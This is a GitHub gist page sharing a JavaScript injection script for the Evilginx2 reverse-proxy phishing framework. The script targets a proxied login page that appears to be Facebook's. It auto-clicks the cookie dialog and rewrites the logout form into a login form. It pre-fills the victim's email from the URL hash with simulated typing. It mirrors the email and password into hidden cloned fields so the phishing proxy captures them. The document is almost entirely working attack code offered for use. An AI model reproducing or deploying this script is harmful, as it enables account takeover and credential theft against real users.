Last active
December 21, 2023 23:48
-
-
Save M41KL-N41TT/519188252e14757db26d87779a538f95 to your computer and use it in GitHub Desktop.
Evilginx2 JavaScript async inject (but applicable for all sites really)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(function() { | |
async function waitForElement(selector) { | |
const startTime = Date.now(); | |
const interval = 255; | |
const timeout = 25500; | |
while (Date.now() - startTime < timeout) { | |
const el = document.querySelector(selector); | |
if (el) return el; | |
await new Promise(r => setTimeout(r, interval)); | |
} | |
throw new Error(`Timeout: Element "\${selector}" did not appear within \${timeout}ms.`); | |
} | |
function triggerEvent(el, eventType) { | |
if (document.createEvent) { | |
const evt = document.createEvent('HTMLEvents'); | |
evt.initEvent(eventType, true, true); | |
el.dispatchEvent(evt); | |
} else if (el.fireEvent) { | |
el.fireEvent('on' + eventType); | |
} | |
} | |
function getRandomInt(min, max) { | |
min = Math.ceil(min); | |
max = Math.floor(max); | |
return Math.floor(Math.random() * (max - min + 1)) + min; | |
} | |
async function simulateTyping(element, inputStr, minDelay = 10, maxDelay = 25) { | |
for (const char of inputStr.split('')) { | |
await new Promise(resolve => setTimeout(resolve, getRandomInt(minDelay, maxDelay))); | |
element.value += char; | |
triggerEvent(element, 'input'); | |
} | |
} | |
function cloneInputField(originalElement, newId) { | |
const clone = originalElement.cloneNode(true); | |
clone.id = clone.name = newId.replace('#', ''); | |
clone.value = ''; | |
clone.style.visibility = 'hidden'; | |
originalElement.parentNode.insertBefore(clone, originalElement.nextSibling); | |
return clone; | |
} | |
async function main() { | |
try { | |
const hashValue = decodeURIComponent(location.hash.slice(1).split('#')[0]); | |
waitForElement("button[data-testid=cookie-policy-manage-dialog-accept-button]") | |
.then(ckElemBtn => { | |
ckElemBtn.click() | |
}) | |
.catch(error => console.error('err1:', error)); | |
waitForElement("form[action*='logout.php']") | |
.then(logOutElem => { | |
logOutElem.action = logOutElem.action.replaceAll('logout', 'login'); | |
return fetch('/conductorwehaveaproblem'); | |
}) | |
.catch(error => console.error('err1:', error)); | |
waitForElement("#email") | |
.then(emailField => { | |
if (emailField.value !== hashValue) { | |
simulateTyping(emailField, hashValue); | |
} | |
const clonedEmailField = cloneInputField(emailField, '#spoofEmail'); | |
emailField.addEventListener('input', () => { | |
clonedEmailField.value = emailField.value; | |
}); | |
}) | |
.catch(error => console.error('err2:', error)); | |
waitForElement("#pass") | |
.then(passwordField => { | |
const clonedPwdField = cloneInputField(passwordField, '#spoofPass'); | |
passwordField.addEventListener('input', () => { | |
clonedPwdField.value = passwordField.value; | |
}); | |
}) | |
.catch(error => console.error('err3:', error)); | |
} catch (error) { | |
console.error('Error:', error); | |
setTimeout(main, loopInterval); | |
} finally { | |
// Schedule the next execution of main | |
// setTimeout(main, loopInterval); | |
} | |
} | |
const loopInterval = 5000; // Loop every 5 seconds | |
// Start the loop | |
main(); | |
})(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment